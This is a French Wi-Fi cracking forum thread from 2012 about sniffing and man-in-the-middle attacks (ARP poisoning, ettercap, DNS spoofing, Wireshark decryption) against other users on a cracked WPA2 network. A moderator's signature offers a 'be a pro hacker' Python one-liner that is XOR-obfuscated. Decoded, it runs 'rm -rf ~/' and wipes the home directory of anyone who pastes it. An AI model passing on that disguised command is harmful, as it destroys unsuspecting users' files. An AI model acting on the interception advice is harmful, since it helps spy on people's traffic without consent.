Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 14-11-2012 14:42:40

mr user
Nouveau membre
Inscription : 12-02-2011
Messages : 8

les attacks sur Wpa2

Bonjour tout le monde j'espere que ca va bien,alors quand on crack un resaux wep par exemple on peut littéralement controller tous le resaux c'est a dire on peut faire des sniff des mitm..
alors la question que je pose c'est que j'ai remarque que si on crack resaux wpa2(WPA2,CCMP,PSK) on peut rien faire ni sniffer ni faire des mitm on peut seulement profiter de l'internet s'il existe alors j'ai vu qu'il y a une exploit nome Hole 196 alors est ce que ca march en pratique?est ce qu'on peut faire des attacks sur les personnes qui existe sur un resaux wpa2(sauf les attacks connu (metasploit..)) c'est a dire sniffer ou bien faire un mitm

Merci

Dernière modification par mr user (14-11-2012 14:44:05)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 14-11-2012 14:58:00

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : les attacks sur Wpa2

Arf, on a décrété une nouvelle taxe sur la ponctuation ou quoi ?! hmm

Le WPA (1 ou 2) utilise des clés différentes pour chaque client connecté, différentes mais issues de la même PSK évidemment. Ces clés sont mises en place lors du handshake, donc pour pouvoir déchiffrer du trafic WPA il faut être en possession de la passphrase ET le handshake de la station visée. Il est donc possible de sniffer le trafic d'une autre station en WPA, par exemple avec Wireshark
--> How to Decrypt 802.11 -- Wireshark Wiki

Wireshark Wiki a écrit :

WPA and WPA2 use keys derived from an EAPOL handshake to encrypt traffic. Unless all four handshake packets are present for the session you're trying to decrypt, Wireshark won't be able to decrypt the traffic. You can use the display filter eapol to locate EAPOL packets in your capture.

WPA and WPA2 use individual keys for each device. Older versions of Wireshark may only be able to use the most recently calculated session key to decrypt all packets. Therefore, when several devices have attached to the network while the trace was running, the packet overview shows all packets decoded, but in the detailed packet view, only packets of the last device that activated ciphering are properly deciphered.

Comme indiqué ci-dessus, Wireshark n'est pas capable de déchiffrer le trafic de plusieurs stations simultanément (enfin, en tout cas il n'en était pas capable, je n'ai pas testé récemment). On peut donc sniffer le trafic d'une seule station à la fois, la dernière connectée, et si quelqu'un vient se connecter après on perd la transmission...

Je parle ici d'un sniff passif, en ce qui concerne les attaques actives elles interviennent généralement en couche 2 ou 3 (ARP ou IP) donc le chiffrement du signal ne change rien : ce qui était possible en WEP est possible en WPA. Dès lors qu'on est connecté au même LAN que la/les vcitime(s), on peut toujours faire de l'empoisonnement ARP et autres détournements sympathiques pour détourner le trafic wink

Et pour finir, l'attaque Hole196 c'est un coup de FUD dont l'importance a largement été exagérée par les auteurs et qui s'est fait démonter dès que les détails ont été publiés...
--> Faille WPA2 : intuitions... [sid.rstack.org]
--> Hole196 : confirmations... [sid.rstack.org]

Dernière modification par antares145 (14-11-2012 17:10:24)

Hors Ligne

#3 14-11-2012 16:26:33

mr user
Nouveau membre
Inscription : 12-02-2011
Messages : 8

Re : les attacks sur Wpa2

d'abord merci antares145 pour votre reponse mais je demande seulemnt est ce que vous êtes sure de cette phrase "ce qui était possible en WEP est possible en WPA" car j'ai tester et ca ne marche pas alors avec un ettercap j'ai essaye de faire le mitm puis un dns spoof et ca marche pas en faite je ne peut meme pas capturer le trafic avec ettercap(conexions que le victim par exemple fait avec un site) (car en faite je ne peut pas changer arp cache du victime) rien ne marche avec WPA2 mais quand je change mon routeur en mode wep je peut faire ces attacks et merci une autre fois

Hors Ligne

#4 14-11-2012 16:46:25

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : les attacks sur Wpa2

Ce qui est possible en WEP est possible en WPA.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
15 747 22-09-2016 21:48:03 par koala
19 1124 05-09-2016 17:32:03 par david_01
9 17544 25-09-2015 22:01:20 par fredo6240
Password list pour wpa2 par arianefurer
5 11656 17-05-2015 20:51:16 par kcdtv
6 1073 01-05-2015 19:09:16 par K4L-EL

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.039 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]